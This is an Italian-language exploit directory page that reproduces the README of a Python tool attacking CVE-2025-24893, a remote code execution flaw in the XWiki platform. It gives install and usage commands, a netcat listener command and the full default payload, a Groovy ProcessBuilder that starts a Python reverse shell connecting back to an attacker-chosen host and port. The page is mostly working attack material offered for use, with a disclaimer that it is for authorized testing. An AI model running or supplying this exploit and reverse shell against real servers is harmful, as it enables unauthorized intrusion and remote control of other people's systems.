Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2025-24893 — Exploit modificato per CVE-2025-24893 | Kitploit
Strumenti/GitHubGitHub/hackersonsteroids/cve-2025-24893
ExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso RemotoSviluppo Payload
GitHubhackersonsteroids/cve-2025-24893

cve-2025-24893

Exploit modificato per CVE-2025-24893

Vedi Repository
51 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-24893 Exploit RCE per XWiki

Exploit Banner

Un semplice script Python3 per sfruttare CVE-2025-24893, una vulnerabilità di esecuzione remota di codice nella piattaforma XWiki, utilizzando una macro asincrona basata su Groovy e un payload di reverse shell configurabile.

⚠️ ATTENZIONE: Questo strumento è fornito esclusivamente per scopi educativi e di test autorizzati. L'uso non autorizzato contro sistemi di cui non si possiede la proprietà o per i quali non si dispone di un'autorizzazione esplicita è illegale e non etico.


Sommario

  • Funzionalità
  • Requisiti
  • Installazione
  • Utilizzo
  • Rilevamento e fallback del protocollo
  • Payload di reverse shell
  • Licenza
  • Disclaimer

Funzionalità

  • ✅ Rileva automaticamente se il target supporta HTTPS o HTTP
  • ✅ Costruisce uno snippet Groovy con ProcessBuilder per evitare le stranezze di Runtime.exec
  • ✅ Codifica in URL il payload della macro async+groovy di XWiki
  • ✅ Reverse shell configurabile (host + porta)
  • ✅ Stampa il codice di risposta HTTP per aiutare a verificare la consegna

Requisiti

  • Python 3.6 o superiore
  • Libreria requests
root@kitploit:~
pip install requests

Installazione

Clona questo repository:

root@kitploit:~
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893

Utilizzo

root@kitploit:~
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
  • <TARGET_DOMAIN> L'host XWiki (ad es. wiki.example.local).

  • <LHOST> L'IP della tua macchina attaccante (dove è in esecuzione il tuo listener).

  • <LPORT> La porta del tuo listener (numero intero).


Esempio

  1. Avvia un listener sulla tua macchina:
root@kitploit:~
nc -lvnp 4444
  1. Esegui lo exploit:
root@kitploit:~
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
  1. In caso di successo, controlla il tuo listener netcat per ottenere una shell.

Rilevamento e fallback del protocollo

Prima di inviare il payload, lo script:

  1. Prova https://<TARGET_DOMAIN>
  2. Ricade su http://<TARGET_DOMAIN> se HTTPS fallisce
  3. Esce se nessuno dei due è raggiungibile

Questo aiuta a garantire la compatibilità con distribuzioni a protocollo misto.


Payload di reverse shell

Per impostazione predefinita, lo script utilizza un one-liner Python3:

root@kitploit:~
new ProcessBuilder(
  ['/bin/bash','-c',
   'python3 -c \'import socket,subprocess,os;'
   's=socket.socket();s.connect(("LHOST",LPORT));'
   'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
   'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
  • Puoi modificare la funzione build_payload() se hai bisogno di una shell diversa (ad es. Bash, Perl, PHP, ecc.).

Licenza

Questo progetto è concesso in licenza sotto la Licenza MIT. Consulta il file LICENSE per i dettagli.


Disclaimer

Questo strumento è progettato esclusivamente per valutazioni di sicurezza autorizzate e scopi educativi. Gli autori non si assumono alcuna responsabilità per un uso improprio. Ottieni sempre un'autorizzazione esplicita prima di testare qualsiasi sistema target.

Scarica lo strumento